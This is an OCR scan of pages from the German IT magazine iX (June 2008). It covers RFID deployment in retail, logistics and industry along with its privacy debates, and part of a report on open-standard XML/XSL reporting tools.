nicht vernachlässigt werden. Die Be- 
rater sind sich im Groben einig, dass 
die hohe Nachfrage mit großer Wahr- 
scheinlichkeit — zumindest diesmal 
noch - in höheren Abschlüssen mün- 
det. Wer darüber hinaus Spezialkennt- 
nisse etwa im SAP-Umfeld aufweist, 
kann durchaus noch einen weiteren 
Gehaltsaufschlag aushandeln. (JS) 
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REPORT 


RFID 


er Hype hat sich gelegt. RFID ha- 
D: teilweise unrealistische Hoff- 

nungen auf einen schnellen und 
umfassenden Einsatz geweckt, so die 
Einschätzung von Branchenkennern [1]. 
Von einem vorsichtigen Optimismus 
sprechen auch die Marktforscher von 
Abi Research. Große RFID-Systeme 
entwickelten sich demnach nicht ganz 
so schnell wie vermutet. Insgesamt aber 
prognostizieren die Autoren von Studien 
sowie Marktforscher von Abi Research 
und Gartner ein weltweites Umsatz- 
Wachstum im RFID-Umfeld zwischen 
20 und 30 Prozent. 

Handel und Logistik treiben RFID 
voran, schrieb iX vor zwei Jahren [2]. 
Das stimmt noch immer. So wandert die 
berührungslose Funktechnologie konti- 
nuierlich von Paletten über Kartons 
langsam auch auf die einzelnen Artikel. 

Für die Ebene der Paletten meldete 
die Metro Group (www future-store. 
org) Ende vergangenen Jahres den 
größten operativen Einsatz von RFID 
im europäischen Handelssektor: Alle 80 
Cash&Carry-Großmärkte in Deutsch- 
land und 100 Real-SB-Warenhäuser er- 
hielten RFID-Wareneingangstore, die 
die mit Tags bestückten Versandpalet- 
ten viel schneller, als es mit den Hand- 
Scannern möglich war, einlesen und 
innerhalb von Sekunden automatisch 
prüfen können, ob eine Lieferung voll- 
ständig ist. 

Im laufenden Jahr sollen noch 200 
Standorte mit Lesegeräten am Waren- 
eingangstor ausgestattet werden, gab das 
Unternehmen auf der Cebit bekannt. Zur 
weiteren Optimierung ist eine Integra- 
tion von Temperatursensoren geplant, 
mit deren Hilfe man überprüfen will, ob 
die Kühlkette bei leicht verderblichen 
Lebensmitteln während des Transports 
nicht unterbrochen wurde. 


Umfassender Einsatz 
dauert noch 


Allein durch die Verwendung von RFID 
auf Paletten kann Metro rund 8,5 Millio- 
nen Euro pro Jahr einsparen. Und auch 
der globale Einsatz läuft. Seit Ende 2007 
versehen 100 Hersteller aus China und 
Vietnam ihre Exportkartons im Rah- 
men des Pilotprojekts „Tag it Easy“ mit 
RFID-Transpondern. Aus Sicht der 
Metro gibt es noch einige Herausforde- 
rungen zu meistern: Dazu gehört das 
weitere Vorantreiben von globalen ein- 
heitlichen Standards für Frequenzen und 
Daten, bezahlbaren technischen Lösun- 
gen, Lesegeräten und Transpondern. 
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Vom unrealistischen Hype 
zum vorsichtigen Optimismus 


Berührungslos 


Barbara Lange 


Berührungslose Funktechnik kennt viele Einsatzbereiche: 

Am bekanntesten ist sie bei Handel und Logistik, aber auch 
andere Branchen wie Luftfahrt, Automobilindustrie oder 
Pharma setzen auf RFID - und jede Branche stellt eigene 
Ansprüche an Transponder und Systeme. Ein Rundumschlag. 


Bis der Konsument tatsächlich sei- 
nen vollen Einkaufswagen durch den 
RFID-Lesebereich der Supermarkt- 
Kasse schieben kann, dauert es wohl 
noch 10 bis 15 Jahre, zumal es noch 
Schwierigkeiten beim Einlesen von Ar- 
tikeln mit Flüssigkeiten oder Metall 
gibt. Branchenkenner schätzen derzeit, 
dass RFID sich zunächst im Handel bei 
teuren Produkten und im Bereich Textil 
durchsetzen wird. 

Zu sehen ist dies derzeit in der Her- 
renabteilung von Galeria Kaufhof in Es- 
sen. Hier befinden sich die Funkchips 


seit September 2007 auf den einzelnen 
Artikeln — sogenanntes Item-Tagging im 
Pilotstadium. Lesegeräte stehen an allen 
Ein- und Ausgängen sowie an Rolltrep- 
pen der Etage. So lässt sich jederzeit er- 
mitteln, wo sich welches Produkt gerade 
befindet und ob der Pullover vielleicht 
noch in anderer Farbe oder Größe auf 
einem anderen Tisch liegt. 

Als großen Vorteil nennen die Be- 
treiber eine hohe Warenverfügbarkeit 
durch einen ständigen Abgleich mit 
dem Warenwirtschaftssystem. Auch der 
Kunde habe Vorteile, denn er erhalte 
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Zusatzinformationen über das Produkt: 
zum Beispiel über mögliche Farbkom- 
binationen, die ihm eine „intelligente 
Umkleidekabine“ (Abb. 1) mitteilt. 

Aber auch der gute alte Barcode 
wird in einigen Szenarien erhalten blei- 
ben, denn RFID ist nur eine von meh- 
reren AutoID-Techniken, was auf der 
Cebit etwa durch den Begriff „Auto- 
ID/RFID-Solutions Park“ zum Aus- 
druck kam. So gibt es im Handel der- 
zeit Überlegungen, ab 2010 den von 
EPCglobal (Electronic Product Code; 
www.epcglobalinc.org) standardisier- 
ten erweiterten Barcode namens „GS1 
DataBar“ global einzuführen. Vorteile: 
Er verfügt über mehr Speicherplatz als 
der herkömmliche Barcode und kennt 
sowohl das Datum für die Mindesthalt- 
barkeit als auch das Gewicht von abge- 
packten Lebensmitteln. 


2D verbindet Online- 
mit Offline-Welt 


Darüber hinaus machen sich derzeit 
2D-Barcodes auf den Weg, die Online- 
und Offline-Welt zu vernetzen [3]. 
Wird das Handy dann zum Lesegerät, 
hätte es gleichzeitig ein Display — was 
viele bislang im RFID-Bereich immer 
vermissten. 


RFID auf Artikelebene 
in der Herrenab- 
teilung der Galeria 
Kaufhof in Essen. 

Die „intelligente 
Umkleidekabine” 
gibt Zusatzinfor- 
mationen zum 
gewählten Produkt 
(Abb. 1). 


Wenn Konsumenten direkt mit 
RFID in Berührung kommen, zeigt sich 
das Spannungsfeld dieser unsichtbaren 
Funktechnik im Konflikt zwischen der 
Optimierung der Logistik und einer be- 
drohten Privatsphäre durch Funkchips, 
die unbemerkt Transaktionen speichern 
und in undurchsichtigen Hintergrundsys- 
temen ablegen können - ein Grund, wa- 
rum Bundesdatenschützer Peter Schaar 
nicht müde wird, das Bedrohungspoten- 
zial von RFID zu thematisieren. Im Zu- 
sammenhang mit Vorratsdatenspeiche- 
rung, ubiquitärem Computing, Biometrie 
und Videoüberwachung entstehen gru- 
selige Szenarien [4]. 

Seine Forderung: Datenschutz und 
Sicherheit müssen von vornherein in 
die Technik integriert sein und nicht 
hinterher aufgepfropft werden. Derzeit 
fehlt es aber noch an der Hardware-Si- 
cherheit, wie unter anderem die Studie 
„RFID-Studie 2007 — Technologieinte- 
grierte Datensicherheit bei RFID-Sys- 
temen“, des Fraunhofer-Instituts für Si- 
chere Informationstechnologie (SIT) 
und anderen feststellt (siehe Kasten 
„Onlinequellen“, [a]). Auf preisgünsti- 
gen Chips gibt es keine Kryptografie, 
auch nicht auf dem von EPCglobal stan- 
dardisierten Transponder „EPC Class1 
Gen2-Tag“ oder zwischen Lesegerät 
und Tag. 


existieren aber. 


A-TRACT 


© RFID hat in einzelnen Branchen einen eigenen Entwicklungsstand. In geschlossenen 
Kreisläufen wird es seit Jahrzehnten eingesetzt, zum Beispiel in der Produktion. 


@ Für offene Kreisläufe sind branchenübergreifende Standards erforderlich. 
Der Standard „EPC ClassI Gen2" definiert die Luftschnittstelle für den Austausch 
mit dem Lesegerät und die Datenstruktur auf dem Transponder. Die branchen- 
übergreifende Verwendung einheitlicher Nummernsysteme ist schwierig umzusetzen. 


@ Im konsumentennahen Einsatzbereich sehen staatliche Stellen derzeit keinen 
Regulierungsbedarf, Vorschläge zu datenschutzfreundlichem RFID-Einsatz 
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Inwieweit die Verantwortlichen in 
Politik und Wirtschaft Forderungen wie 
Datenvermeidung und Datensparsam- 
keit erfüllen werden oder wollen, bleibt 
fraglich. Dass RFID bis mindestens 
2010 überwiegend eine Hintergrund- 
technik bleiben wird, die den Konsu- 
menten nicht direkt betrifft, haben die 
Teilnehmer der europäischen Konferenz 
„Towards the Internet of Things“ fest- 
gestellt, die die Bundesministerien für 
Wirtschaft und Forschung sowie die Eu- 
ropäische Kommission Mitte letzten 
Jahres in Berlin ausgerichtet haben. Eine 
weitere Konferenz ist für den kommen- 
den November angekündigt. 


Selbstregulierter 
Persönlichkeitsschutz 


Bislang ist es bei dieser Einschätzung 
geblieben, wie die Bundesregierung 
Mitte Februar 2008 in einer „Unterrich- 
tung“ [b] mitteilte: Da RFID-Systeme 
noch keine Verbreitung im datenschutz- 
relevanten Bereich gefunden haben, soll 
die Industrie die Persönlichkeitsrechte 
der Konsumenten auf der Basis von 
Selbstregulierung schützen. Gesetzliche 
Vorgaben soll es nicht geben. 

Auch die EU-Kommission setzt auf 
eine Selbstregulierung der Industrie, 
differenziert aber in einem Entwurf die 
Bewältigung von Datenschutzproble- 
men [c]. Den Entwurf, der seit Februar 
online veröffentlicht ist, konnten Bür- 
ger, Unternehmen und Organisationen 
bis Ende April kommentieren. Die vor- 
geschlagenen Regeln: Betreiber von 
RFID-Systemen sollen vor der Imple- 
mentierung abschätzen, welche Folgen 
der Einsatz für die Nutzer hat - ist es 
etwa möglich, eine Person mit den ge- 
wonnenen Daten zu überwachen? Wei- 
terhin schlägt die Kommission vor, 
RFID-Lesebereiche und Produkte ein- 
heitlich zu kennzeichnen. Der Konsu- 
ment müsse die Gelegenheit erhalten, 
den RFID-Chip zu deaktivieren. 

Vor einer gesetzlichen Verankerung 
dieser Wahlmöglichkeit der Deaktivie- 
rung von RFID-Chips warnte indes 
das Informationszentrum RFID (www. 
info-rfid.de) auf der Cebit. Begrün- 
dung: Dies würde die Wettbewerbsfä- 
higkeit der europäischen Wirtschaft 
behindern, zu teuere Chips hervorbrin- 
gen und den Konsumenten daran hin- 
dern, Vorteile beispielsweise bei der 
Garantieabwicklung zu nutzen. Mitglie- 
der des Informationszentrums RFID 
sind weltweit führende Unternehmen 
aus den Bereichen Handel, Konsum- 
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güterindustrie, Automobilbranche, IT 
und Dienstleistung. 

Einen Mittelweg schlägt derzeit das 
Bundesamt für Sicherheit in der Infor- 
mationstechnik (www.bsi.de) ein. Ge- 
meinsam mit NXP Semiconductors er- 
arbeitet das BSI „Technische Richtlinien 
für den sicheren Einsatz von RFID“ 
(TR). In vier Szenarien mit potenziellem 
Konsumentenkontakt sollen die Richt- 
linien RFID ein vergleichbares Sicher- 
heitsniveau ermöglichen: E-Ticketing 
mit und ohne Near Field Communi- 
cation (NFC), das Event-Ticketing bei 
Veranstaltungen sowie der Einsatz in 
Handel und Logistik. 


BSI erarbeitet 
technische Richtlinien 


Referenz-Implementierungen für das Ti- 
cketing sind zum einen die Eintrittskar- 
tenvergabe der Weltmeisterschaft 2006 
und das Projekt Touch&Travel der 
Deutschen Bahn, das derzeit Test-Fahr- 
gästen einen mobilen Fahrkarten,‚kauf“ 
via NFC-Handy ermöglicht (Abb. 2). 
Dazu lesen die Handys den Anfangs- 


Bahn modern: 

Das Einlesen des 
Start- und Zielortes 
einer Bahnreise via 
Handy erspart das 
Schlangestehen 

am Ticketschalter. 
Bezahlt wird später 
per Rechnung 
(Abb. 2). 


und Zielort am Bahnhof ein. Aus diesem 
Themenspektrum fällt das vierte Szena- 
rio „Handel und Logistik“ etwas hinaus, 
weshalb man im BSI wohl auch zu Re- 
daktionsschluss noch daran arbeitete. 

Das BSI verfolgt mit der TR RFID 
den Anspruch, als neutrale Stelle eine 
Richtlinie herauszubringen, die den 
sicheren Einsatz von RFID unterstützt 
und die Privatsphäre der Konsumen- 
ten schützt. Darüber hinaus hofft man 
die Aufnahme in europäische Emp- 
fehlungen. 


Touchpoint 


Als alles durchdringende Quer- 
schnittstechnik misst auch die Bundes- 
regierung der berührungslosen Funk- 
technik eine große Bedeutung zu und 
fördert vier Projekte, die neue Ge- 
schäftsfelder erschließen sollen: Ko- 
RFID, LAENDmarKS, LogNetAssist 
und Sm@rtLogistics. Die Projekte sind 
Teil des auf dem IT-Gipfel 2006 und 
2007 definierten Leuchtturmvorhabens 
„Internet der Dinge“ (www.nextge 
nerationmedia.de). Eine große Rolle 
spielt dabei die Automobilindustrie, 
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REPORT 


RFID 


In der Automobilfertigung ist der RFID-Einsatz in geschlossenen Systemen von 
Vorteil und längst üblich: Die in den Schutzkästchen befindlichen wiederver- 
wertbaren Tags kennen den Produktionsstatus jedes Fahrzeugs. Bei Störungen 
kann man so anschließend wieder an der richtigen Stelle fortfahren (Abb. 3). 


wobei man auch die Übertragbarkeit 
auf andere Branchen wie Luftfahrt 
oder Medizin prüft. Das mit 5 Millio- 
nen Euro geförderte Projekt Ko-RFID 
untersucht, wie global und firmen- 
übergreifend kooperierende Unterneh- 
men Kosten, Nutzen und Risiken fair 
aufteilen können (siehe auch Bericht 
S. 21). Darüber hinaus wollen die Ko- 
operationspartner — dabei sind SAP, 
Gerry Weber, DaimlerChrysler und der 
Küchenhersteller Wellmann — heraus- 
finden, wo die Daten am besten zu 
speichern sind: auf dem Tag oder in da- 
hinter liegenden Netzwerken. 


Neue Geschäftsfelder 
in Erprobung 


Um eine schnelle Rückverfolgbarkeit 
sicherheitsrelevanter Automobilkom- 
ponenten geht es im Projekt LAEND- 
marKS. Die Projektbeteiligten, darun- 
ter DaimlerChrysler, Volkswagen und 
IBM, wollen ein Nachverfolgungssys- 
tem aufbauen, das alle Beteiligten infor- 
miert, wenn fehlerhafte Teile im Umlauf 
sind — und zwar vor dem Einbau. 

Ein audiovisuelles Assistenzsystem 
entsteht im Projekt LogNetAssist (Bosch, 
Siemens, Daimler und das Fraunhofer- 
Insitut IML). Eine multimediale Visu- 
alisierung des Warenflusses soll Ent- 
scheidungshilfen zur Steuerung von 
Logistikprozessen geben. 

Und last but not least gehört zu den 
neuen Betätigungsfeldern Sm@rtLogis- 
tics, ein RFID-gestütztes Produktions- 
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und Beschaffungslogistiksystem für die 
Automobilzulieferindustrie. Dabei geht 
es darum, die Mitarbeiter bei der Mate- 
rialversorgung optimal einzusetzen. 
Auch wird für jeden Auftrag die Bela- 
dung der Transportmittel neu berech- 
net. Projektbeteiligte sind die Intellion 
AG, die RWTH Aachen, die simcron 
GmbH, die TU Dresden und die tedrive 
Germany Gmbh. 


Branchenspezifische 
Anforderungen 


Dass man jede Branche und jeden Ein- 
satzbereich von RFID genau untersu- 
chen muss, um zu angemessenen An- 
wendungen zu kommen, ist Konsens. 
So sind Ansprüche, Bedingungen und 
historische Entwicklung der RFID-Nut- 
zung in der Automobil- und Luftfahrt- 
industrie etwa ganz andere als im Han- 
del, zum Beispiel in Bezug auf die 
Sicherheit sowie die Speicherfähigkeit 
und Leistung der Transponder. 

Auch ist noch nicht ganz klar, inwie- 
weit die einzelnen Branchen den Ende 
2004 von EPCglobal standardisierten 
„EPC ClassI Gen2 Tag“ nutzen werden 
oder eigene Standards verwenden. Der 
Gen-2-Tag, der die Luftschnittstelle für 
den Austausch mit dem Lesegerät und 
die Datenstruktur auf dem Transponder 
für den Electronic Product Code (EPC) 
definiert, versteht sich zwar branchen- 
übergreifend und ist in die ISO-Norm 
18000-6C eingeflossen, kommt aber 
überwiegend im Handel zum Einsatz. 


Als erster Automobilhersteller trat 
Daimler im November 2007 der Stan- 
dardisierungsorganisation EPCglobal 
bei und beteiligt sich dort an der Ent- 
wicklung von RFID-Standards auch für 
die Automobilindustrie, was besonders 
für global vernetzte Material- und Pro- 
duktionsströme über Unternehmens- 
grenzen hinweg wichtig wird. 

Noch betreibt die Automobilindustrie 
derzeit überwiegend RFID-Systeme in 
der Fertigungsumgebung und Pilotpro- 
jekte im Logistikbereich. Seit Anfang 
der 80er-Jahre steuert RFID die Produk- 
tion und hat sich dort in geschlossenen 
Systemen mit hochwertigen wieder- 
verwendbaren Transpondern etabliert 
(Abb. 3). Das betont Holger Schönherr, 
Leiter des Kompetenz-Centers RFID bei 
Siemens Industry Automation in einem 
Gespräch mit iX. Nach wie vor sei der 
größte Einsatzbereich in geschlossenen 
Kreisläufen zu finden, in denen RFID- 
Systeme vollständig integriert sind. Die 
Bearbeitungsschritte werden auf dem 
Tag am Objekt gespeichert, was unter 
anderem die Wiederaufnahme der Pro- 
duktion bei Störungen sehr erleichtert. 
Diese mobile Datenspeicherung am Ob- 
jekt erweist sich vor allem für die vari- 
antenreiche Produktion als wichtig, da 
sich hieraus entscheidende Wettbe- 
werbsvorteile ergeben, so Schönherr. 

Wichtig ist RFID auch aufgrund der 
steigenden Komplexität in den indus- 
triellen Lieferketten. Der Endkunde kann 
sich sein Automodell individuell zu- 
sammenstellen — eine Herausforderung 
für die Bereitstellung der richtigen Bau- 
teile zur richtigen Zeit am richtigen Ort. 


Verwendung eigener 
Nummernsysteme 


Ging es zunächst primär um die Daten- 
speicherung an Objekten, werden jetzt 
Schritte getan in Richtung einer auto- 
matischen Identifizierung von Bautei- 
len und ihrer Verfolgung über die gan- 
ze Lieferkette hinweg. Dabei spielt 
auch besagter Gen-2-Tag von EPCglo- 
bal eine Rolle. Woran man sich hält, ist 
der standardisierte Datenaustausch mit 
dem Reader. Aber welche Daten man 
in welcher Struktur auf den Transpon- 
der schreibt, das bleibt Sache der Auto- 
mobilhersteller. 

Auch die Luftfahrtindustrie ver- 
wendet eigene historisch gewachsene 
Nummerierungen für ihre Teile, die 
sich nicht so einfach mit dem Electro- 
nic Product Code aus Handel und Lo- 
gistik vereinbaren lassen. Innerhalb 
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der Air Transport Association (ATA) 
arbeitet man derzeit an der Definition 
der Datenstruktur, die man auf dem 
Transponder speichern will. Die von 
EPCglobal standardisierte Luftschnitt- 
stelle will die Industrie aber berück- 
sichtigen. 

Für den Einsatz von RFID im Flug- 
zeug bei der Wartung hochwertiger 
Teile gibt es eine zusätzliche Anforde- 
rung: Der Transponder benötigt eine 
hohe Speicherkapazität, da man auch 
hier die Daten lokal ablegen will, muss 
hohe Temperaturschwankungen aus- 
halten und resistent sein gegen Umpro- 
grammierungsversuche von Fahrgäs- 
ten. Ein solcher Chip ist derzeit noch 
nicht verfügbar. Ob sich der Anfang 
des Jahres von Fujitsu veröffentlichte 


Chip mit einer Speicherkapazität von 
64 Kilobyte eignet, muss sich zeigen. 


Fazit 


Der RFID-Einsatz läuft unaufhörlich, 
wobei es deutliche Unterschiede in den 
einzelnen Branchen gibt. Inwieweit die 
branchenübergreifende Standardisie- 
rung fortschreiten wird, scheint derzeit 
noch nicht absehbar. Was darüber hin- 
aus noch fehlt, sind Transponder mit 
großer Speicherkapazität und autono- 
mer Energieversorgung, zusätzlichen 
Displays und kryptografischen Sicher- 
heitsmaßnahmen. 

Neue Anwendungen entstehen durch 
die Integration von Sensoren in RFID- 


[a] RFID-Studie 2007 - Technologieintegrierte Datensicherheit bei RFID-Systemen 
www.sit.fraunhofer.de/lmages/RFID-Studie2007_tcm 105-98165.pdf 


[b] Unterrichtung durch die Bundesregierung 


dip21.bundestag.de/dip21/btd/16/078/1607891.pdf 


[e] EU-Entwurf zum Datenschutz 


ec.europa.eu/information_society/policy/rfid/doc/consde.pdf 


Systeme, die Temperatur, Erschütterun- 
gen oder die Luftfeuchtigkeit messen. 
So wird beispielsweise eine Überwa- 
chung der Temperatur im Lebensmittel- 
bereich möglich. (ur) 
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REPORT 


XML 


Herstellerunabhängiges Reporting mit XSL und Co. 


Der saubere Weg 


Markus Karg, Sebastian Krebs 


Für ein anspruchsvolles Reporting benötigt man nicht 
unbedingt teure Software. Professionelle Ergebnisse sind dank 
der offenen Standards XSL und SVG selbst mit einfachen 
Open-Source-Werkzeugen zu erzielen. Benutzerfreundlichkeit 
fügt der kommerzielle Digiforms Designer hinzu. 


iele Unternehmen binden sich an 
V* proprietäres Produkt, um Re- 
ports zu erstellen. Die dadurch 
entstehende Herstellerunabhängigkeit 
kann sich mittelfristig als technisch un- 
flexibel herausstellen. Eine Hinwen- 
dung zu offenen Standards und freien 
Werkzeugen ist in diesem Zusammen- 
hang nicht zuletzt eine betriebswirt- 
schaftlich getriebene Entscheidung. 
Für das Berichtswesen erforderliche 
Software besteht üblicherweise aus ei- 
nem Designwerkzeug zur Erstellung 
von Berichtsvorlagen sowie einer Run- 
time-Engine, die mit diesen Berichts- 
vorlagen aus Rohdaten-Dateien Berich- 
te auf dem Bildschirm sowie auf dem 
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Drucker ausgeben kann. Als nachteilig 
kann sich erweisen, wenn das Design- 
werkzeug nur mit beschränkten W YSI- 
WYG-Fähigkeiten ausgestattet ist und 
die Runtime-Engine nur für Windows 
zur Verfügung steht. Außerdem müs- 
sen in solchen Fällen Druckvorlagen 
und der Eingangs-Datenstrom in einem 
proprietären Format vorliegen. 

Ein Tausch des Designwerkzeugs 
oder der Runtime-Engine gegen Pro- 
dukte konkurrierender Hersteller kann 
schwierig sein. Im Rahmen der Portie- 
rung der betriebswirtschaftlichen Rah- 
menanwendung auf die Java-Plattform 
und des damit einhergehenden Paradig- 
menwechsels (Plattformunabhängigkeit 


und Unterstützung allgemein akzeptier- 
ter Standards) stellte sich für die Auto- 
ren die Frage der Nachfolge. Der An- 
spruch an die künftige Software klang 
zunächst relativ einfach: 
— Ein Endanwender kann mit einem für 
Laien einfach zu bedienenden WYSI- 
WYG-Editor eigene Berichtsvorlagen 
generieren. 
- Die betriebswirtschaftliche Anwen- 
dung ruft zur Laufzeit Vorlagen auf und 
wandelt sie mit einem Rohdaten-Strom 
in Bildschirmansichten und Ausdrucke. 
-Eingangsdatenstrom und die Druck vor- 
lagen entsprechen einem Standardfor- 
mat, um einen späteren Tausch einzelner 
Komponenten sowie die Interoperabilität 
mit Drittsystemen zu gewährleisten. 
Allerdings schränkten diese Krite- 
rien die Auswahl der infrage kommen- 
den Produkte stark ein. 


Standards, 


wo immer möglich 


Nach eingehender Recherche fiel die 
Entscheidung für XML als Format für 
die Inhaltsdaten, kodiert in UTF-8. Dies 
erleichtert die Bereitstellung der eigent- 
lichen Daten durch die betriebswirt- 
schaftliche Anwendung ungemein, da 
die verwendete Java-Plattform XML- 
Syntax und -Kodierung von Haus aus 
unterstützt, eine aufwendige und fehler- 
anfällige Eigenentwicklung des Daten- 
exports deshalb weitgehend entfallen 
konnte. Umlaute und andere Sonderzei- 
chen zu verarbeiten, wie sie im interna- 
tionalen Geschäftsverkehr zunehmend 
eine Rolle spielen, war mit der alten 
Software nicht machbar; das ist mit 
UTF-8 ebenfalls passe. 

Statische Bilder wie JPGs für Logos 
et cetera sollten als Referenz im Daten- 
strom vorkommen, während aus dem 
Inhalt berechnete Informationen, bei- 
spielsweise Balkendiagramme, nicht die 
Anwendung selbst, sondern ein externer 
Renderer, sozusagen on the fly, erstel- 
len sollte. Seine Aufgabe war es, aus 
den XML-Daten anhand von zuvor ge- 
stalteten Berichtsvorlagen eine druckba- 
re Zieldatei in einem Standardformat, 
etwa PDF, zu erzeugen. Das ist mit dem 
Datenformat XML/UTF-8 gegeben. 
Mehrfach vorhandene Elemente, bei- 
spielsweise ein wiederkehrendes Logo, 
müssen im Datenstrom nicht zwingend 
immer wieder auftauchen, sondern man 
kann sie dank XML einmal definieren 
und später mehrfach referenzieren. Das 
verkleinert den zu verarbeitenden Da- 
tenstrom und fördert die Performance. 


iX 6/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


Durch die WYSIWYG- 
Arbeitsweise erhält 
der Anwender schon 
beim Erstellen der 
Vorlage einen 


lebendigen Eindruck .. Neem 


des späteren Im et 
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Für die Berichtsvorlagen wünschten 
sich die Autoren ebenfalls XML, in 
Gestalt von XSL (Extensible Stylesheet 
Language). Die Sprache erfüllt mit 
XSLT (XSL Transformations) für die 
Transformation und XSL-FO (XSL For- 
matting Objects) für das Layout pro- 
fessionelle Ansprüche. Hinter der Ent- 
scheidung für XSL stand der Wunsch, 
sowohl dem Endanwender die freie 
Wahl des Bearbeitungswerkzeugs als 
auch den Programmierern die freie 
Wahl der Rendering-Engine zu lassen. 
Das Erzwingen einer bestimmten Pro- 
duktkombination sollte auf jeden Fall 
vermieden werden — hauptsächlich auf- 
grund schlechter Erfahrungen. 


Jeder kennt es, 
keiner kann es 


Zum Zeitpunkt der Recherche (Anfang 
2006) waren im Bereich XML-basierter 
Reporting-Werkzeuge unter anderem be- 
kannte Produkte: Stylus Studio, Xulta- 
tion Designer, Antenna House Designer, 
Syntax Serna, Intelliview, XFDesigner, 
XSLefast sowie Altova Stylevision. Bei 
genauerer Betrachtung zeigte sich, dass 
sie sich nur bedingt für den gewünsch- 
ten Anwendungszweck eigneten. Ent- 
weder waren sie zu komplex, was die 
Kenntnisse der Mehrzahl der Anwender 
überstiegen hätte, oder es fehlten echte 
WYSIWYG-Fähigkeiten. 
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Eine in XSLT 
geschriebene Makro- 
Bibliothek hilft, 
aufwendige 
Vektorgrafiken on 
the fly zu erzeugen 
(Abb. 2). 


Grund hierfür ist, dass die Herstel- 
ler eher Programmierer und weniger 
„unbedarfte“ Anwender im Blick ha- 
ben. Ebenso erfüllte nicht jedes Werk- 
zeug den Wunsch, dass Druck vorlagen 
und Datenstrom auf freien Standards 
aufsetzen sollten. Viele Produkte kön- 
nen zwar XML verarbeiten, speichern 
Druckvorlagen jedoch in einem pro- 
prietären Format. Ein Austausch von 
Druckvorlagen zwischen verschiedenen 
Mitarbeitern mit unterschiedlichen Ge- 
staltungswerkzeugen wäre somit un- 
möglich, da nicht jeder Hersteller eine 
Anleitung seines XSD-Schemas bei- 
legt, was für eine Transformation als 
einzigen Ausweg nötig wäre. 

Zu guter Letzt erzwangen eine gan- 
ze Reihe von Werkzeugen bestimmte, 
wiederum proprietäre Rendering-Pro- 
dukte, wodurch das Kriterium der freien 
Austauschbarkeit der Rendering-En- 
gine nicht mehr erfüllt war. Über- 
raschend war zudem, dass die Herstel- 
ler überwiegend zwar mit den Worten 
XML oder sogar XSL-FO werben, da- 
mit aber keineswegs meinen, dass die 
Berichtsvorlage selbst in diesem offenen 
Standard vorliegt. Einige Produkte be- 
nutzen XSL-FO nur intern, andere eine 
proprietäre Formatierungssprache zur 
Ansteuerung des hauseigenen Rende- 
rers (der kostenpflichtig ist). 

Unter dem viel zitierten Strich blieb 
lediglich ein einziges Produkt, das alle 
genannten Kriterien erfüllte: Der Xul- 
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REPORT 


XML 


WYSIWYG-Editor 
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Vorlagenverwendung 


Renderer 
(FOP) 


Rendering- 
Anweisung 


[XSLFO) 


(PDF) 


Die Prozesskette beruht auf offenen Standards und freien Werkzeugen (Abb, 3). 


tation Designer des norwegischen Soft- 
warehauses Metafocus AS, das dieses 
Produkt inzwischen unter dem geänder- 
ten Namen Digiforms Designer ver- 
treibt. Die Produktbeschreibung deckte 
sich vollständig mit der Liste der gefor- 
derten Standards. Die Frage war nur, 
ob dies in der Praxis zutrifft. 


Ehrenrettung 
aus Norwegen 


Version 3.0 des Digiforms Designer ist 
in erster Linie ein vollwertiges WYSI- 
WYG-Werkzeug zur Erstellung von 
Vorlagen jeglicher Art, wobei die zu 
verarbeitenden Eingangsdaten in einem 
beliebigen XML-Schema vorliegen müs- 
sen und das Format der Druckvorlagen 
den Standards XSLT 1.0, XSL-FO 1.0 
sowie XPath 1.0 entspricht. Intern be- 
nutzt das Tool Apache FOP 0.20.5 zur 
PDF-Voransicht, ist zur Laufzeit je- 
doch keineswegs auf diesen speziellen 
Renderer angewiesen, da keinerlei pro- 
prietäre Erweiterungen zum Einsatz 
kommen. 

Anwendern dürfte als Erstes auffal- 
len, dass die Benutzung stark an ein 
Malprogramm erinnert: Sie können 
ohne Vorkenntnisse innerhalb weniger 
Minuten einen einfachen Bericht mit 
Tabellen, Textfeldern et cetera gestal- 
ten. Ein besonderes Highlight stellt der 
sogenannte Trace-Mode dar: Ein ein- 
gescanntes Formular stellt Digiforms 
Designer beim Bearbeiten als Hinter- 
grundgrafik dar. Mit einem Klick in die 
Grafik erkennt der Designer Position 
und Größe von Datenfeldern im Scan 
automatisch und fügt entsprechende 
Eingabefelder in die Druckvorlage ein. 
Die Umsetzung von papiernem Be- 
richtswesen auf elektronische Berichte 
ist dadurch ein Kinderspiel. Im Test hat 
das reibungslos funktioniert. 

Der eingebaute XML-Browser er- 
möglicht eine XPath-Adressübernah- 
me bestimmter XML-Knoten per Maus- 
klick in das gewünschte Berichtsfeld, 
sodass keine tiefgehenden XPath- 
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Kenntnisse nötig sind. Man klickt ein- 
fach auf die Baumdarstellung der Da- 
ten und zieht die Information an die 
gewünschte Stelle in der WYSIWYG- 
Ansicht der Vorlage. Darüber hinaus 
kann man sämtliche in XPath 1.0 defi- 
nierten Funktionen benutzen, sofern 
man sie kennt. Hierzu ist jedoch das 
manuelle Schreiben von XPath-Aus- 
drücken innerhalb des Eigenschaften- 
Dialogs des Feldes notwendig, was 
angesichts der Einfachheit von XPath 
jedoch keinen unangemessenen Lern- 
aufwand nach sich zieht. Darüber hin- 
ausgehend stellt das Produkt viele wei- 
tere Features zur Verfügung, die jedoch 
den Rahmen dieses Artikels sprengen 
würden. 


XML rein, SVG raus 


Üblicherweise gestaltet sich der Ein- 
stieg in die beschriebene Prozesskette 
etwa so, dass der Anwender per Maus 
anhand der XML-Struktur ein meist 
tabellenlastiges Layout gestaltet. Um 
aber zu einem wirklich anspruchsvol- 
len Druckergebnis zu gelangen, kommt 
man sicherlich in der Mehrzahl der 
Anwendungsfälle nicht um das dyna- 
mische Generieren von Vektorgrafiken 
herum, beispielsweise um Balkendia- 
gramme zu erzeugen. Zwar bietet Digi- 
forms Designer hierzu vorgefertigte, ru- 
dimentäre Unterstützung der Scalable 
Vector Graphics (SVG) an - aus XML- 
Daten generiert er zur Laufzeit eine 
SVG-Grafik -, jedoch dürfte sich der 
professionelle Anwender nicht mit die- 
sen Ergebnissen zufriedengeben. Das 
Produkt ist daher in jeglicher Richtung 
offen, das heißt, man kann beliebige, 


Digiforms Designer _www.metafocus.no/en/ 
FOP xmlgraphics.apache. 
org/fopf 


XSLT Standard Library xslisl.sourceforge.net/ 


in XSLT geschriebene Template-Bi- 
bliotheken einbinden und von jedem 
Feld des Berichts aus aufrufen. Bei- 
spielsweise könnte die bekannte Bi- 
bliothek XSLTSL zum Einsatz kom- 
